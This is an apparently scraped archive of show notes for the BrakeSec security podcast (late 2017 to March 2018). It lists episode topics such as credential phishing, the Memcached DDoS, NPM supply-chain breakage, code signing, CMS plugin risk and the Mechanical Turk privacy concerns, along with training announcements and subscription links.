Think in the bigger picture
Is not being able to see the value in a non-infosec person coming to the team a sign of immaturity in a company?
The phrase “must be able to hit the ground running”
Turn off for those wanting to make that change
Feel they must already know the job
People should be considered as like a block of clay, not an immutable stone.
People can change if they want to…
2 party comfort zone. Both the person changing role/title, and the company understanding where the person sits in the position.
mentorship/menteeship in an org
Published on: March 19, 2018BDIR-001: Credential stealing emails, How do you protect against it?
BDIR Episode - 001
Our guests will be:
Martin Brough - Manager of the Security Solutions Engineering team in the #email #phishing industry
Topic of the Day:
CREDENTIAL STEALING EMAILS WHAT CAN YOU DO
Join us for Episode-001, our guest will be:
- Martin Brough - Manager of the Security Solutions Engineering team in the email phishing industry
Topic of the day will be:
"CREDENTIAL STEALING EMAILS WHAT CAN YOU DO"
Show Notes:
- Introductions
- Introduce our Guest
- Martin Brough
- Twitters - @HackerNinja
- Blog - InfoSec512.com
- Martin Brough
More show notes at https://www.imfsecurity.com/podcasts/2018/2/28/bdir-podcast-episode-001
Published on: March 12, 20182018-008- ransomware rubes, Defender does not like Kali, proper backups
https://www.auditscripts.com/free-resources/critical-security-controls/
Thanks to Slacker Ben Chung, who heard about this from John Strand...
BsidesIndy report - Amanda
Bsides Austin - Brian
Log_MD 2.0 - www.log-md.com
https://itsfoss.com/kali-linux-debian-wsl/
Matt Miller’s #Assembly and #Reverse #Engineering class
$150USD for each class, 250USD for both classes
Syllabus : https://docs.google.com/document/d/1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0/edit?usp=sharing
Please state which class you'd like to take when ordering in the "Notes" field in Paypal https://paypal.me/BDSPodcast/150usd
To sign up for both classes: https://paypal.me/BDSPodcast/250usd
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 12, 2018
2018-007- Memcached DDoS, Secure Framework Documentation, and chromebook hacking
Topics:
- Secure Framework documents
- Modifying chromebooks so you can use Debian/Ubuntu
- Memcached is the new DDoS hotness
- Announcement of the next BrakeSec Training Class (see Show Notes below for more info)
Link to secure framework document: https://drive.google.com/open?id=1xLfY4uI88K2AiA1mosWJ7jFyP100Jv5d
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
--Show Notes--
Announcements:
Matt Miller’s class on Assembly and Reverse engineering
Starts 2 April - 6 sessions
2nd Class - 6 sessions, beginning 21 May
Beginner course on Assembly
Advanced course, dealing with more advanced topics
$150 for each class, or a $250 deal if you sign up for both classes
paypal.me/BDSPodcast/150USD - Specify in the NOTES if you want the “Beginner” or “Advanced” course
paypal.me/BDSPodcast/250USD - If you want both courses
We need a minimum of 10 students per class
Projects:
Chromebook with Debian
Bit of a pain, if I could be honest..
Needed USB hub with eth0, and a USB soundcard
USB3 low profile thumbdrives would be better
https://www.amazon.com/gp/product/B01K5EBCES/ref=oh_aui_detailpage_o01_s00?ie=UTF8&psc=1
https://www.securecontrolsframework.com/ ←--well well worth the signup
https://drive.google.com/open?id=1xLfY4uI88K2AiA1mosWJ7jFyP100Jv5d - ‘secure.xlsx’
http://www.dummies.com/programming/certification/security-control-frameworks/
Numerous security frameworks already exist:
Cisco
NiST
CoBIT
ITIL (can be utilized)
SWIFT https://www.accesspay.com/wp-content/uploads/2017/09/SWIFT_Customer_Security_Controls_Framework.pdf
“My weird path to #infosec” on twitter
https://en.wikipedia.org/wiki/Hydrocolloid_dressing
Published on: March 5, 20182018-006- NPM is whacking boxes, code signing, and stability of code
Topics on today's show:
NPM (Node Package Manager) - bug was introduced changing permissions on /etc, /boot, and /usr, breaking many systems, requiring full re-installs. Why was it allowed to be passed, and worse, why did so many run that version on production systems?
Code signing - a well known content management system does not sign it's code. What are the risks involved in not signing the code? And we talk about why you should verify the code before you use it.
Using code without testing - NPM released a 'not ready for primetime' version of it's package manager. We discuss the issues in running 'alpha', and 'beta'
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
SHOW NOTES:
Previous podcast referenced: http://traffic.libsyn.com/brakeingsecurity/2018-005-Securing_CMS_and_mobile_devices-phishing_story.mp3
NPM -
Using ‘pre-production’ software without testing is not advisable
Unfortunately, many assume all software is stable
A product of ‘devops’ - failing forward “we’ll just fix it in post”
Talked last podcast about ‘supply chain security’
https://givan.se/do-not-sudo-npm/
Developers can leave a project, leaving code unmaintained… or dependencies
Also, a modicum of trust is required… verifying the code before you use it.
Verification that the code came from where it was supposed to
Many important code bases aren’t signed or have verification
Wordpress does not appear to publish file hashes
Can you always trust the download? Sure, they do TLS… but no integrity, or non-repudiation
https://docs.microsoft.com/en-us/windows-hardware/drivers/dashboard/get-a-code-signing-certificate
https://www.thawte.com/code-signing/whitepaper/best-practices-for-code-signing-certificates.pdf
Bsides NASH-
https://bsidesnash.org/2018/02/20/interview-and-resume-workshop/
Published on: February 26, 20182018-005-Securing_your_mobile_devices_and_CMS_against_plugin_attacks
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-005-Securing_CMS_and_mobile_devices-phishing_story.mp3
Topics:
Discussion of Ms. Berlin's course
CAPEC discussion
RTF malware MS Office
A Phishing story...
Mobile Supply Chain Security
CMS Supply Chain Security
Ms. Berlin’s course - recap of 2nd session
Brakeing Down IR -date?
Any malware of note?
Upgrade your Office! Just double-clicked, used rtf and document never opened, just the script ran.
Supply chain isn’t just Hardware… software stacks abound and not followed
Wordpress plugins, CMS plugins/themes… not monitored, weakly secure
Keeping track is as important as asset management
Do you know what your CMS is running, plugin wise?
And if plugins aren’t bad enough, you have PHP to deal with
Suggestions:
Buy plugins - you get what you pay for
Check what support you get (always a good idea)
Require reviews for new plugins, and old ones, esp if they haven’t updated in a while
Are they still maintained? (abandonware bad)
New owners? (many plugins and apps get bought and then start changing permissions, or worse, serving malware)
Joomla -
Vulnerable Extensions list - https://vel.joomla.org/live-vel
Wordpress - WPScan https://wpvulndb.com/plugins
https://theconversation.com/explainer-how-malware-gets-inside-your-apps-79485
CCleaner -
https://www.theverge.com/2017/9/18/16325202/ccleaner-hack-malware-security
News:
Adversary generation systems
Red Baron - https://www.coalfire.com/Solutions/Coalfire-Labs/The-Coalfire-LABS-Blog/february-2018/introducing-red-baron
https://github.com/uber-common/metta
https://github.com/NextronSystems/
https://www.kitploit.com/2018/02/venom-1015-metasploit-shellcode.html
Quickly building Redteam Infrastructure
https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/
#Spotify: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 14, 20182018-004 - Discussing Bsides Seattle, and Does Autosploit matter?
Show Notes:
https://docs.google.com/document/d/1CSjskf-3vrguoyIyg8yOK2KLqg7srxYlee4RD6jzgNc/edit?usp=sharing
Topics Discussed:
New tool : AutoSploit - Does it lower the bar?
How should Blue teamers be using Shodan?
Discuss WPAD attacks, what WPAD is, and why it's a thing blue teams should worry about.
ANNOUNCEMENTS:
Ms. Amanda Berlin is running 4 session of her workshop "Disrupting the Killchain" starting on the 5th of February at 6:30pm Pacific Time (9:30 Eastern Time) If you would like to sign up, the fee is $100 and you can send that to our paypal account at https://paypal.me/BDSPodcast, send as a 'gift'
Course Syllabus: https://docs.google.com/document/d/12glnkY0nxKU9nAvekypL4N910nd-Nd6PPvGdYYJOyR4/edit
#Spotify: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 5, 2018
BDIR-000 ; The Beginning
Here is the inaugural episode of the "Brakeing Down Incident Response"
Please check it out!
BDIR Episode - 000
Our guests will be:
Dave Cowen - Forensic Lunch Podcast and G-C Partners
Tyler Hudak - Trainer in Malware Analysis and Reverse Engineering
Topic of the Day:
WHAT IS THIS NEW PODCAST ALL ABOUT, WHAT WILL IT COVER?
"Incident Response, Malware Discovery, and Basic Malware Analysis,
Detection and Response, Active Defense, Threat Hunting, and where does it fit within DFIR"
SHOW NOTES:
https://www.imfsecurity.com/podcast/2018/1/18/bdir-podcast-episode-000
Published on: January 29, 2018
2018-003-Privacy Issues using Crowdsourced services,
Back in late 2017, we did a show about expensify and how the organization was using a service called 'Amazon Mechanical Turk' (MTurk) to process receipts and to help train their Machine Learning Algorithms. You can download that show and listen to it here: 2017-040
#infosec people on Twitter and elsewhere were worried about #privacy issues, as examples of receipts on MTurk included things like business receipts, medical invoices, travel receipts and the like.
One of our Slack members (@nxvl) came on our #Slack channel after the show reached out and said that his company uses services like these at their company. They use these services to test applications, unit testing, and creation of test cases for training and refinement of their own applications and algorithms.
We discuss the privacy implications of employing these services, how to reduce the chances of data loss, the technology behind how they make the testing work, and what other companies should do if they want to employ the Mturk, or other 3rd parties.
Direct Show Download: http://traffic.libsyn.com/brakeingsecurity/2018-003-MTurk-NXVL-privacy_issues_using_crowdsourced_applications.mp3
ANNOUNCEMENTS:
Ms. Amanda Berlin is running 4 session of her workshop "Disrupting the Killchain" starting on the 4th of February at 6:30pm Pacific Time (9:30 Eastern Time) If you would like to sign up, the fee is $100 and you can send that to our paypal account at https://paypal.me/BDSPodcast
Course Syllabus: https://docs.google.com/document/d/12glnkY0nxKU9nAvekypL4N910nd-Nd6PPvGdYYJOyR4/edit
#Spotify: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Show Notes:
Mr. Boettcher gave a talk (discuss) http://DETSec.org
Brakeing Down Incident Response Podcast
Amanda’s class (starts 4 february, $100 for 4 sessions, $50 for early video access)
I need to mention HITB Amsterdam
David’s Resume Review -- Bsides Nash Resume Review
SANS SEC504 Mentor course
Guest: Nicolas Valcarcel
Twitter: @nxvl
Possible News to discuss:
https://www.reddit.com/r/sysadmin/comments/7sn23c/oh_security_team_how_i_loathe_you_meltdown/
Mechanical Turk
CircleCi 2.0
https://circleci.com/docs/2.0/
TaskRabbit
https://www.taskrabbit.com/
Historically: https://en.wikipedia.org/wiki/The_Turk
Expensify using Amazon Mechanical Turk
https://www.theverge.com/2017/11/28/16703962/expensify-receipts-amazon-turk-privacy-controversy
https://www.wired.com/story/not-always-ai-that-sifts-through-sensitive-info-crowdsourced-labor/
FTA: “"I wonder if Expensify SmartScan users know MTurk workers enter their receipts. I’m looking at someone’s Uber receipt with their full name, pick up, and drop off addresses," Rochelle LaPlante, a Mechanical Turk worker who is also a co-administrator of the MTurk Crowd forum, wrote on Twitter.”
https://www.dailydot.com/debug/what-is-amazon-mechanical-turk-tips/
“About those tasks, they’re called HITs, which is short for Human Intelligence Tasks. A single HIT can be paid as low as a penny but may take only a couple seconds to complete. Requesters often list how long a task is supposed to take, along with the nature of the work and the requirements for completing the work.”
“Since mTurk has been around for over a decade, Amazon has created a special class of workers called Masters Qualification. Turkers with masters have usually completed over 1,000 HITs and have high approval ratings.”
Kind of like a Yelp for HIT reviewers?
Are companies like expensify aware of the data that could be collected and analyzed by 3rd parties?
Is it an acceptable risk?
Privacy questions to ask for companies that employ ML/AI tech?
Are they using Mturk or the like for training their algos?
Are they using Master level doers for processing?
Nxvl links:
Securely Relying on the Crowd (paper Draft):
https://github.com/nxvl/crowd-security/blob/master/Securely%20relying%20on%20the%20Crowd.pdf
How to Make the Most of Mechanical Turk: https://www.rainforestqa.com/blog/2017-10-12-how-to-make-the-most-of-mechanical-turk/
How We Maintain a Trustworthy Rainforest Tester Network: https://www.rainforestqa.com/blog/2017-08-02-how-we-maintain-a-trustworthy-rainforest-tester-network/
The Pros and Cons of Using Crowdsourced Work: https://www.rainforestqa.com/blog/2017-06-06-the-pros-and-cons-of-using-crowdsourced-work/
How We Train Rainforest Testers: https://www.rainforestqa.com/blog/2016-04-21-how-we-train-rainforest-testers/
AWS re:Invent: Managing Crowdsourced Testing Work with Amazon Mechanical Turk: https://www.rainforestqa.com/blog/2017-01-06-aws-re-invent-crowdsourced-testing-work-with-amazon-mturk/
Virtual Machine Security: The Key Steps We Take to Keep Rainforest VMs Secure: https://www.rainforestqa.com/blog/2017-05-02-virtual-machine-security-the-key-steps-we-take-to-keep-rainforest-vms/
Published on: January 27, 20182018-002-John_Nye-Healthcare's_biggest_issues-ransomware
Ms. Berlin's course "Disrupting the Kill Chain" is planned to start on the 5th of February, and will be 4 sessions, with new material if you've seen her workshop at previous conferences. The cost of the class will be $100 USD for access to our Zoom webex. If you'd like to gain access to the videos we'll have for the class, you can buy access to them for $50 USD.
Sign up with our Paypal link: Paypal -- When paying, if you want us to send you a different email from your Paypal email, please add it to the 'NOTE' section during your payment.
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2018-002-John_Nye-Healthcares-biggest_issues-ransomware.mp3
#Spotify: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
From our friends at Hack In the Box Amsterdam:
2018-001- A new year, new changes, same old trojan malware
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-001-A_new_year-new_changes-same_old_malware.mp3
The first show of our 2018 season brings us something new (some awesome new additions to our repertoire), and something old (ransomware).
Michael Gough is joining us to discuss a new a partnership with BrakeSec Podcast (you'll have to listen to find out, or wait a few weeks :D )
We discuss #Spectre and #meltdown vulnerabilities, wonder about the criticality of the vulnerabilities and mitigation of them, and debate why the patching was handled in such a poor manner.
We also discuss a news story about a school that spent an exorbitant amount of money to remove a trojan that Mr. Boettcher (@boettcherpwned) and Mr. Gough (@hackerhurricane) believe to be very simply handled. We talk about the need for state and local governments and institutions to have a some way to call for breaches or 'cyber' crisis that would have a no-blame assistance helpline.
I did a quick video, which has a demonstration of Dave Kennedy's security tool "Pentester Framework" (PTF). There's even a video of the demo on our Youtube Channel (https://youtu.be/sIc1ljkwE5Q)
Finally, we discuss our upcoming training with Ms. Berlin (@infosystir) "Disrupting the Cyber Kill Chain", which will start the first week of February and go for 4 weeks. More details next week!
#Spotify: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at [email protected]
or DM us on Twitter @brakesec
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
From our friends at Hack In the Box Amsterdam:
Music change
Couldn’t remember where I got the other music
Little more news than we used to
Try to shy away from news everyone will talk about
Brakeing Down Incident Response (BD-IR) podcast
Hosted by Mr. Boettcher and Michael Gough
Vendor talks
Sponsors (provisionally)
News:
http://www.zdnet.com/article/wpa3-wireless-standard-tougher-wifi-security-revealed/
https://threatpost.com/new-rules-announced-for-border-inspection-of-electronic-devices/129361/
Upcoming Training:
Amanda? - Cyber KillChain training
Dates: Feb 5-26 Mondays at 9:30pm (4 - 1 hour)
Matt Miller - Reverse Engineering course
More advanced, still working on details with him (no promises yet)
Michael Gough - Malware Archaeology
Austin - Feb or March - 1 Day Logging training - see AustinISSA.Org
Houston - April 3rd - 1 Day - HouSecCon
Preparing and Responding to an endpoint incident, what to configure, and look for
Tulsa - April 11-12th - 2 Days - BSides Oklahoma
Introduction to responding to an endpoint incident, Malware Discovery, what to configure, and look for
Job postings on our Slack
Sr. Manager, Vuln Mgmt, Amazon (Herndon, VA)
Michael Fourdraine @mfourdraine has several positions on his team in Bellevue, WA
He’s on Twitter (https://twitter.com/mfourdraine) or join us in our Slack
Many positions he has will relocate you to lovely Bellevue, WA
MG just posted “James Avery Information Security Manager”
Teaching a mentor course in Seattle (SEC504) starting March 1st.
Sign up: https://www.sans.org/mentor/class/sec504-seattle-01mar2018-bryan-brake
Great if you work a job where you get called a lot
Less likely to have to get up during class and walk away…
Bit of a technical discussion - PTF (pentester framework)
Setup, install software
Lighter than Kali
Works on debian, ubuntu, pretty much any linux
Slack
Invite only
Slack bot died
A new link every month is a bit of a PITA
Being popular invites bots… would like to reduce that risk by broadcasting an invite
Friend of mine was invited to speak on “A man’s view of women in technology” O.o (http://www.cmhwit.org/)
“ John ---- Actually, my plan at this point is to interview several of the successful woman I know in technology, followed by personal observations of how I've seen them become well respected leaders in the field.”2017-SPECIAL005-End of year Podcast with podcasters
As is tradition (or becoming around here) we like to get a bunch of podcasters together and just talk about our year. No prognostications, a bit of silliness, and we still manage to get in some great infosec content.
Please enjoy! And please seek out these podcasts and have a listen!
Slight warning: some rough language
People and podcasts in attendance:
Tracy Maleef (@infosecSherpa)
Purple Squad Security Podcast (@purpleSquadSec) -
John Svazic (@JohnsNotHere)
Advanced Persistent Security (@advpersistsec) - Joe Gray (@C_3PJoe)
Danny Akacki (@dakacki) - RallySec Podcast (@rallysec)
Nate L (@gangrif) - Iron Sysadmin Podcast (@ironsysadmin)
*NEW* we are now on Spotify!: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Sign up at
https://brakesec.com/Dec2017BrakeSlack
or DM us on Twitter, or email us.
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
From our friends at Hack In the Box Amsterdam:
2017-042-Jay beale, Hushcon, Apple 0Day, and BsidesWLG audio
Ms. Berlin and Mr. Boettcher are on holiday this week, and I (Bryan) went to Hushcon (www.hushcon.com) last week (8-9 Dec 2017). Lots of excellent discussion and talks.
While there, our friend Jay Beale (@jaybeale) came on to discuss Hushcon, as well as some recent news.
Google released an 0day for Apple iOS, and we talk about how jailbreaking repos seem to be shuttering, because there have not been as many as vulns found to allow for jailbreaking iDevices.
We also went back and discussed some highlights of the DFIR hierarchy show last week (https://brakesec.com/2017-041) and some of the real world examples of someone who has seen it on a regular basis. Jay's insights are something you shouldn't miss
Finally, Ms. Berlin went to New Zealand and gave a couple of talks at Bsides Wellington (@bsideswlg). She interviewed Chris Blunt (https://twitter.com/chrisblunt) and "Olly the Ninja" (https://twitter.com/Ollytheninja) about what makes a good con.
Direct Link: https://brakesec.com/2017-042
*NEW* we are now on Spotify!: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Sign up at
https://brakesec.com/Dec2017BrakeSlack
or DM us on Twitter, or email us.
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
From our friends at Hack In the Box Amsterdam:
--Show Notes--
https://github.com/int0x80/githump
https://techcrunch.com/2017/11/27/ios-jailbreak-repositories-close-as-user-interest-wanes/
https://securelist.com/unraveling-the-lamberts-toolkit/77990/
Published on: December 16, 2017
2017-041- DFIR Hierarchy of Needs, and new malware attacks
Maslow's Hierarchy of needs was developed with the idea that the most basic needs should be satisfied to allow for continued successful development of the person and the community inevitably created by people seeking the same goals.
DFIR is also much the same way in that there are certain necessary basics needed to ensure that you can detect, respond, and reduce possible damage inflicted by an attack.
In my searching, we saw a tweet about a #github from Matt Swann (@MSwannMSFT) with just such a ' #DFIR hierarchy of needs'. We discuss everything that is needed to build out a proper DFIR program.
Mr. Boettcher discusses with us the latest #malware trends, using existing compromised emails to spread using threaded emails.
Direct Download Link: https://brakesec.com/2017-041
*NEW* we are now on Spotify!: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Sign up at
https://brakesec.com/Dec2017BrakeSlack
or DM us on Twitter, or email us.
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
--Show Notes--
Malware report
https://www.lastline.com/labsblog/when-scriptlets-attack-excels-alternative-to-dde-code-execution/
https://www.securityforrealpeople.com/2017/10/exploiting-office-native-functionality.html
https://github.com/swannman/ircapabilities - DFIR Hierarchy
Based on Maslow’s Hierarchy of needs: https://en.wikipedia.org/wiki/Maslow's_hierarchy_of_needs
Requirements must be met before you can move on.
It’s not perfect, but gives a general idea of how needs should be met.
Published on: December 8, 2017
2017-040-Expensify_privacy_issues-Something_is_rotten_at_Apple
With Mr. Boettcher out this week due to family illness, Ms. Berlin and I discussed a little bit of what is going on in the world.
Expensify unveiled a new 'feature' where random people would help train their AI to better analyze receipts. Problem is that the random people could see medical receipts, hotel bills, and other PII. We discuss how they allowed this and the press surrounding it. We also discuss why these kinds of issues are prime reasons to do periodic vendor reviews.
Our second story was on Apple's "passwordless root" account. We talk about the steps to mitigate it, why it was allowed to happen, and why the most straight forward methods of dealing with something like this may not always be the best way.
Direct Link: https://brakesec.com/2017-040
*NEW* we are now on Spotify!: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Sign up at
https://brakesec.com/Dec2017BrakeSlack
or DM us on Twitter, or email us.
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
---Show Notes---
Agenda:
Trip report from Amanda to New Zealand
Did we talk about Amanda’s appearance on PSW?
Discuss last week’s show about custom training
Comments? Suggestions for custom training solutions?
https://www.sans.org/mentor/class/sec504-seattle-01mar2018-bryan-brake
Expensify -
https://www.wired.com/story/not-always-ai-that-sifts-through-sensitive-info-crowdsourced-labor/
https://www.theverge.com/2017/11/28/16703962/expensify-receipts-amazon-turk-privacy-controversy
How is this different than like a medical transcriptionist?
Don’t you go in and modify the receipts yourself? Or is that a feature you can force?
It’s a privacy issue.
Hotel receipts, boarding passes, even medical receipts
Turn off ‘smart scan’?
Many companies like using it, and some will only accept smart scanned receipts
Fat fingering receipts isn’t ‘cool’
Snap a photo, move along
